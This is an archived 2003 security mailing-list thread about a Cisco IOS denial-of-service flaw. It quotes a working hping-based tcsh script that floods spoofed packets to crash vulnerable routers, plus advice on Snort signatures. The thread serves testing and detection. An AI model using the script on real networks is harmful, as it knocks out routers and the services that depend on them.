I think this is what you're looking for.
<snip>
Subject: RE: [Snort-users] RE: [Snort-sigs] Suggested Sig for Cisco DOS
Vulnerability
Here's a simple script I wrote that you can use to generate an attack:
> cat exploit.sh
#!/bin/tcsh -f
if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif
foreach protocol (53 55 77 103)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto
$protocol --count 19 --interval u250 --data 26
end
As you can see, this script iterates over the various protocols and sends 19
packets each for a total of 76 (just enough to fill up the input queue on
vulnerable routers). Before upgrading my routers, I confirmed that this
attack works. I then tested to see if sending 76 packets of a single
protocol was enough to hose the interface.. it was. Maybe I mis-read the
original advisory, but it seemed to me that Cisco suggested all 4 were
necessary.
Therefore, be careful when creating your signatures.. If you don't use any
of the above protocols (SWIPE, IP Mobility, Sun ND, PIM) it might make sense
to have rules that log/alert on all of them. Don't make the rules too
dependent on the payload either; in several packet captures I've seen, the
payload is significantly larger than the 26 bytes necessary to exploit IOS.
--
Patrick Donahue
Network/Systems Administrator
ACMI Corporation
</snip>
----- Original Message -----
From: "Curt Purdy" <purdyat_private>
To: <rnewsat_private>; <incidentsat_private>
Sent: Sunday, July 20, 2003 7:58 PM
Subject: RE: Cisco IOS Denial of Service that affects most Cisco IOS
routers- requires power cycle to recover
> Could we have an example of an hping command to invoke this. I have been
> playing with it and would like a real-world example, and since there a now
> multiple exploits out, this knowledge should not be a problem. Thanks.
>
> Curt
>
> ----------------------------------------
>
> Practice safe hex.
>
> - Andrew Briney, editor Information Security
>
>
> -----Original Message-----
> From: Richard Johnson [mailto:rdumpat_private]
> Sent: Sunday, July 20, 2003 2:21 AM
> To: incidentsat_private
> Subject: Re: Cisco IOS Denial of Service that affects most Cisco IOS
> routers- requires power cycle to recover
>
>
> In article
> <Pine.BSO.4.53.0307172223150.11409at_private-guesswork.com>,
> Tina Bird <tbird@precision-guesswork.com> wrote:
>
> > information on the detailed structure of the evil packets in these
> > protocols is not yet public AFAIK.
>
>
> The router has problems if it receives a packet, content irrelevant,
> that makes it to supervisor level claiming an IP protocol that it
> doesn't have code to handle.
>
> The kickup to supervisor level happens when the packet is targeted
> directly at the router's IP address (per first Cisco advisory) or just
> has its TTL expire in transit past the router (per revised Cisco
> advisory).
>
> Send enough packets (default 75), and the input queue is full. hping is
> enough of a launch platform for that--there's no need for
> questionable-source exploit binaries when testing.
>
>
> Richard
>
> --
> My mailbox. My property. My personal space. My rules. Deal with it.
> http://www.river.com/users/share/cluetrain/
>
> --------------------------------------------------------------------------
--
> Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
> world's premier technical IT security event! 10 tracks, 15 training
> sessions,
> 1,800 delegates from 30 nations including all of the top experts, from
CSO's
> to
> "underground" security specialists. See for yourself what the buzz is
> about!
> Early-bird registration ends July 3. This event will sell out.
> www.blackhat.com
> --------------------------------------------------------------------------
--
>
>
>
> --------------------------------------------------------------------------
-
> --------------------------------------------------------------------------
--
>
>
>
---------------------------------------------------------------------------
----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 13:26:53 PDT